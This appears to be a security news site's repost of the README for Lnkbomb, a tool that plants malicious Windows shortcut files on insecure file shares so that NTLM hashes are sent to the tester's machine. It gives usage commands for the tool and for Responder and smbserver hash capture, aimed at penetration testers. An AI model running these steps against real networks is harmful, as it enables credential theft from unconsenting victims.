Lnkbomb - Malicious shortcut generator for collecting NTLM hashes from insecure file shares


Lnkbomb is used for uploading malicious shortcut files to insecure file shares. The vulnerability exists due to Windows looking for an icon file to associate with the shortcut file. This icon file can be directed to a penetration tester's machine running Responder or smbserver to gather NTLMv1 or NTLMv2 hashes (depending on configuration of the victim host machine). The tester can then attempt to crack those collected hashes offline with a tool like Hashcat.

The payload file is uploaded directly to the insecure file specified by the tester in the command line. The tester includes their IP address as well, which is written into the payload.

Python Usage

Installing Lnkbomb

Note that the project works consistently in Windows. It may have issues in Linux.

git clone https://github.com/dievus/lnkbomb.git

Change directories to lnkbomb and run:

python3 lnkbomb.py -h

This will output the help menu, which contains the following flags:

-h, --help - Lists the help options

-t, --target - Specifies the target file share (ex. -t \\\Share)

-a, --attacker - Specifies the tester's attack machine (ex. -a

-r, --recover - Used to remove the payload when testing is completed (ex. -r randomfilegenerated.recover)

Examples of full commands include:

python3 lnkbomb.py -t \\\Share -a

python3 lnkbomb.py -r randomfilegenerated.recover

You will need to utilize a tool like Responder or smbserver to capture the NTLM hash.
responder -I eth0 -dwf -v


smbserver.py . . -smb2support

Executable Usage

Download Lnkbomb from the releases link on the right side of the page. All flags are the same as the Python version, with the exception of using lnkbomb.exe rather than python3 lnkbomb.py.


Please keep in mind that this tool is meant for ethical hacking and penetration testing purposes only. I do not condone any behavior that would include testing targets that you do not currently have permission to test against.

Original repository: https://github.com/dievus/lnkbomb

April 25, 2022
Notify of

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Inline Feedbacks
View all comments
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2023
What certifications or qualifications do you hold?
Max. file size: 150 MB.

What level of experience should the ideal candidate have?
What certifications or qualifications are preferred?

Download Free eBook

Step 1 of 4


We’re committed to your privacy. Hakin9 uses the information you provide to us to contact you about our relevant content, products, and services. You may unsubscribe from these communications at any time. For more information, check out our Privacy Policy.